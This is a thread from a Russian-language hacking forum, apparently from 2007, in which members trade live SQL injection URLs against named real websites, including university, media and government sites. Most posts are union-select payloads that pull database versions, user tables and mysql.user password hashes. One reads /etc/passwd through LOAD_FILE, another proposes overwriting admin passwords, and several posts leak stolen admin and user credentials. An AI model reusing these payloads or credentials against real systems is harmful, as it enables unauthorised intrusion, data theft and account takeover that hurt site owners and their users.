SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.agenciapulsar.org/coberturas_det.php?id=-1+union+select+1,version(),user(),4,5,6,7,8/*
     
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    пошел значит я почитать про выборы в Питере...
    Code:
    http://www.vybor-spb.ru/area.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4+from+mysql.user/*
    вот как у нас хорошо готовятся)
     
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    -вырезано-
    ошибочка :)
     
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    решил слить всё что у меня накопилось =D ужос..
    начнём с ЭДУ
    admin:tm9537!# - вход в админку справа. Ничё интересного я там не нашёл
    поддомен Гарварда. Находится к сожалению на другом серваке
    так и не нашёл как попасть в админку. Хотя искал не очень внимательно... =)
    хз чё там. Сервак на винде
    опять поддомен гарварда и опять другой сервер
    Превед
    без лимита страничка наглухо виснет и негрузится
    как сказал Грей пароль в SHA-1
    ууух. Ну вот это пока что всё =) ещё где то была скуля в зоне GOV но я потерял =)
     
    3 people like this.
  5. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://alx.ultranet.ru/joke_show.php?id=-1+union+select+1,version(),user()/*
    PHP:
    http://www.tklenta.ru/articles_txt.php?id=-1+union+select+user(),version()/*
     
    #805 Colkru, 9 Mar 2007
    Last edited: 9 Mar 2007
  6. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    вот от меня скуля ;)
    Code:
    http://lib.prometey.org/?lib=forum&t=-92+union+select+1,concat(user_login,char(58),user_pass,char(58),user_mail)+FROM+user+limit+10353,1/*
    не плохо 10353 юзеров и все пассы в чистом виде :eek:
    login:bob
    pass:mixail26
    сама админка http://lib.prometey.org/admin.php
     
    3 people like this.
  7. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://www.intercar.com.ua/index.php?id=-1+union+select+1,2,version(),user(),5,6+from+users/*
    PHP:
    http://www.viking.tm/product.php?id=-1+union+select+1,2,3,4,5,6,7/*
    PHP:
    http://chugworth.com/comic.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
     
    #807 Colkru, 9 Mar 2007
    Last edited: 9 Mar 2007
  8. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    PHP:
    www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'
     
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    можно кста вот так:
    Code:
    http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
    &&
    Code:
    http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12+from+mysql.user/*
     
    #809 n1†R0x, 9 Mar 2007
    Last edited: 9 Mar 2007
    1 person likes this.
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.vrijwilligerswerk.be/informatie/informatie.php?id=2+order+by+99
    UPDATE
    т е можно сделать +union+update+admins+set+password='preved'

    http://www.soaw.org/new/sub.php?id=2+order+by+99

    http://pride.uoregon.edu/section.php?id=-6+unioN+select+1,2,3,4,5,6
     
    1 person likes this.
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.aglob.ru/books/?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10/*
    Code:
    http://www.m-study.ru/art/?news_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
     
    1 person likes this.
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    America On-Line
    судя по пути на сервере, сам AOL находится на другом серваке
     
    1 person likes this.
  13. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.wargames.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(name,0x3a,uname,0x3a,pass),8,9,10,11,12,13+from+users+limit+0,1/*
    было или нет, не видел..
     
    2 people like this.
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.eng.wayne.edu/page.php?id=-1505+union+select+1,2,3,4,5,6/*
     
  15. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,0x3a,password),2,3,4,5,6+from+mysql.user+limit+1,1/*
    mysql hash
     
  16. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    update

    Code:
    http://www.eng.wayne.edu/page.php?id=-1505+union+select+1,convert(id+using+latin1),3,4,5,6+from+users/*
     
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    PHP:
    http://www.yuretz.ru/prikol.php?id=471'
     
  18. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    http://www.yuretz.ru/prikol.php?id=-471+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
     
    1 person likes this.
  19. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    мож кто разбирается в PostgreSQL:
    Code:
    http://www.nne.ru/news.php?id=1658'
    
    Довольно странная там шифровка паролей:
    Code:
    http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,TABLE_NAME,5,6+from+information_schema.tables+limit+16,1/*
    http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,concat(Username,0x3A,Password),5,6+from+Admin+limit+3,1/*
    
    пара слепых вроде:
    Code:
    http://www.fm.gov.lv/page.php?id=-1+union+select+1111111111111111/*
    http://daily.com.ua/analytics/page.php?id=32346+union+select+1,2/*
    
     
    #819 VampiRUS, 10 Mar 2007
    Last edited: 10 Mar 2007
  20. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.ricardocabello.com/index.php?postid=-1+union+select+1,2,3,4,5,6,7,8/*
    Code:
    http://pnnonline.org/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    если кто-то додумает названия таблиц, буду благодарен) у меня фантазии не хватает уже =\
     
    1 person likes this.
Thread Status:
Not open for further replies.